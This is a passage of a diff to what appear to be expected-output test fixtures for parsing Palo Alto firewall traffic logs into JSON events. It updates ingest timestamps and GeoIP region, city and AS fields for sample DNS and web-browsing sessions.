"2021-12-09T13:43:22.381760Z", + "ingested": "2021-12-14T14:50:18.748402174Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3225,26 +3110,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3340,7 +3220,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381765600Z", + "ingested": "2021-12-14T14:50:18.748402657Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3365,26 +3245,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 806, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3480,7 +3355,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381768800Z", + "ingested": "2021-12-14T14:50:18.748403002Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3505,26 +3380,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3620,7 +3490,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381773Z", + "ingested": "2021-12-14T14:50:18.748403355Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3645,26 +3515,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3760,7 +3625,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381778Z", + "ingested": "2021-12-14T14:50:18.748403691Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3785,26 +3650,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3900,7 +3760,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381782600Z", + "ingested": "2021-12-14T14:50:18.748404049Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -3925,26 +3785,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 13069, "bytes": 504, - "ip": "175.16.199.1", - "packets": 8 + "packets": 8, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4040,7 +3895,7 @@ }, "event": { "duration": 125000000000, - "ingested": "2021-12-09T13:43:22.381786200Z", + "ingested": "2021-12-14T14:50:18.748404389Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -4065,26 +3920,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4180,7 +4030,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381790300Z", + "ingested": "2021-12-14T14:50:18.748404729Z", "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", @@ -4205,26 +4055,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4320,7 +4165,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381795700Z", + "ingested": "2021-12-14T14:50:18.748405079Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -4345,26 +4190,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 9130, - "ip": "175.16.199.1", - "packets": 10 + "packets": 10, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4460,7 +4300,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381799700Z", + "ingested": "2021-12-14T14:50:18.748405423Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -4485,26 +4325,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4600,7 +4435,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381803500Z", + "ingested": "2021-12-14T14:50:18.748405765Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -4625,26 +4460,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4740,7 +4570,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381806800Z", + "ingested": "2021-12-14T14:50:18.748406107Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -4765,26 +4595,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -4880,7 +4705,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381811200Z", + "ingested": "2021-12-14T14:50:18.748406568Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -4905,26 +4730,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5020,7 +4840,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381816600Z", + "ingested": "2021-12-14T14:50:18.748406929Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24910,1,59302,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5045,26 +4865,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5160,7 +4975,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381822Z", + "ingested": "2021-12-14T14:50:18.748407263Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26862,1,59301,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5185,26 +5000,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5300,7 +5110,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381827300Z", + "ingested": "2021-12-14T14:50:18.748407600Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26222,1,64844,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5325,26 +5135,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5440,7 +5245,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381832600Z", + "ingested": "2021-12-14T14:50:18.748407955Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26329,1,52257,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5465,26 +5270,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 111, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5571,7 +5371,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381837900Z", + "ingested": "2021-12-14T14:50:18.748408307Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25142,1,38796,53,0,0,0x0,udp,allow,206,95,111,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5596,26 +5396,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 906, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5711,7 +5506,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381843300Z", + "ingested": "2021-12-14T14:50:18.748408652Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25095,1,59200,80,0,0,0x200000,tcp,allow,1503,597,906,13,2012/04/10 04:39:23,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5736,26 +5531,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 5013, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5842,7 +5632,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381848600Z", + "ingested": "2021-12-14T14:50:18.748408997Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,paloalto-wildfire-cloud,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -5867,26 +5657,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 40026, "bytes": 99, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -5982,7 +5767,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381853900Z", + "ingested": "2021-12-14T14:50:18.748409335Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -6007,26 +5792,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 40029, "bytes": 902, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6122,7 +5902,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381859300Z", + "ingested": "2021-12-14T14:50:18.748409687Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -6147,26 +5927,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 141, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6253,7 +6028,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381864600Z", + "ingested": "2021-12-14T14:50:18.748410036Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -6278,26 +6053,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6393,7 +6163,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381867900Z", + "ingested": "2021-12-14T14:50:18.748410400Z", "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 